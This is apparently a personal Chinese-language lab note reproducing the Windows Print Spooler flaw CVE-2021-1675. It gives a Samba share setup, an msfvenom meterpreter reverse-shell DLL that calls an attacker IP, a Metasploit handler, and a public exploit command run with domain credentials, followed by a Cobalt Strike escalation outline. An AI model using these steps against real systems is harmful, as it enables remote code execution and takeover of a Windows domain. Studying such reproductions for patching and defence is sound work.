漏洞编号:
CVE-2021-1675
- 漏洞描述:
Print spooler 是 windows 打印后台处理服务,在windows平台使用打印所需调用的服务。攻击者可绕过RpcADDPrinterDriver的身份验证,该函数可能允许远程身份验证的攻击者以系统权限在易受攻击的系统上执行任意代码。企业中域普通账户就可以利用此漏洞。
- 漏洞影响范围:
略
- 漏洞复现:
本次复现使用kali攻击机一台,一台window server2019,域内普通用户账号一个复现。
配置一个smb共享服务
[global] workgroup = WORKGROUP server string = Samba Server netbios name = MYSERVER log file = /var/log/samba/log.%m max log size = 50 security = user map to guest = Bad User [smb] comment = Template Directories browseable = yes writeable = yes path = /tmp/ //攻击机 /tmp目录作为共享目录 guest ok = yes
|
启动smb服务
service smbd start
|
使用msf生成后门,并监听
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.150.120 LPORT=4444 -f dll -o /tmp/rever.dll |
msfconsole |
use exploit/multi/handler |
set payload windows/x64/meterpreter/reverse_tcp |
set lhost 0.0.0.0 |
run
|
安装impacket工具利用该漏洞
lmpacket官方介绍为用于处理网络协议的Python类的集合,该集合包含了渗透测试中常见的工具种类,包括远程命令执行、信息收集、票据传递、凭据获取、中间人攻击测试等。该套件里的工具使用也是linux主机跳向windows主机的方式之一。
git clone https://github.com/cube0x0/CVE-2021-1675 python3 CVE-2021-1675.py qf.com/zy:0925scm.@192.168.150.128 '\\192.168.150.120\smb\rever.dll' |
尝试提权
思路:首先我们知道impacket工具已经可以实现将文件上传到域内主机,那么我们可以尝试结合cobalt strike来进行提权等操作
创建监听
生成dll文件,将dll通过smb上传到域主机,使cobaltstrike上线
python3 CVE-2021-1675.py qf.com/zy:0925scm.@192.168.150.128 '\\192.168.150.120\smb\artifact.dll'
|
上线成功后,尝试提权
通过日志和命令可以看到我们拿到最高权限了
漏洞总结:
这个复现各个步骤理解,smb服务搭建在其中起到一个跳板的作用,给msf生成的dll提供了上传途径,使impacket可以将smb共享的rever.dll文件上传到域主机中,从而可以实现远程代码执行。从而可以尝试提权,达到控制域内所有主机的目的。
本篇笔记主要参考了
PS:写的笔记仓促,提权部分细节没有写到,以上理解是我个人理解,并非一定正确仅供参考。欢迎钢筋评论区对线。